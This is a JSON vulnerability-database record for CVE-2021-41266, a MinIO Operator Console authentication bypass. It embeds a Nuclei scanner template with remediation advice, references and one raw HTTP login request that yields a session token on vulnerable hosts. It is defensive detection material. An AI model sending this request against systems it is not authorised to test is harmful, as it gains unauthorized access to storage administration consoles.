{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-41266/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-41266/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-41266/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-41266/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-41266/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-41266"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-41266"
    }
  },
  "enrichments": {
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-41266.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2021-41266\n\ninfo:\n  name: MinIO Operator Console Authentication Bypass\n  author: alevsk\n  severity: critical\n  description: |\n    MinIO Console is a graphical user interface for the for MinIO Operator. MinIO itself is a multi-cloud object storage project. Affected versions are subject to an authentication bypass issue in the Operator Console when an external IDP is enabled.\n  impact: |\n    An attacker can bypass authentication and gain unauthorized access to the MinIO Operator Console.\n  remediation: 'Update to v.0.12.3 or higher. Users unable to upgrade should add automountServiceAccountToken: false to the operator-console deployment in Kubernetes so no service account token will get mounted inside the pod, then disable the external identity provider authentication by unset the CONSOLE_IDP_URL, CONSOLE_IDP_CLIENT_ID, CONSOLE_IDP_SECRET and CONSOLE_IDP_CALLBACK environment variable and instead use the Kubernetes service account token.'\n  reference:\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-41266\n    - https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36\n    - https://github.com/minio/console/pull/1217\n    - https://github.com/HimmelAward/Goby_POC\n    - https://github.com/StarCrossPortal/scalpel\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-41266\n    cwe-id: CWE-306\n    epss-score: 0.48414\n    epss-percentile: 0.98823\n    cpe: cpe:2.3:a:min:minio_console:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: min\n    product: minio_console\n  tags: cve2021,cve,minio,min,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/v1/login/oauth2/auth HTTP/1.1\n        Host: {{Hostname}}\n        Accept: */*\n        Content-Type: application/json\n\n        {\"code\":\"test\",\"state\":\"test\"}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"sessionId\"\n\n      - type: word\n        part: header\n        words:\n          - \"token\"\n\n      - type: status\n        status:\n          - 201\n          - 200\n        condition: or\n# digest: 4a0a00473045022100d664f55f209fee09a1bc4d0a7ab00e60325483a2fc6fc14ded8a616a7aabcaa902204eaa3a989ed18cd5c469020dee7b9064b79af9baedb2d7666ef3dbcfaec3c4ec:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-41266"
}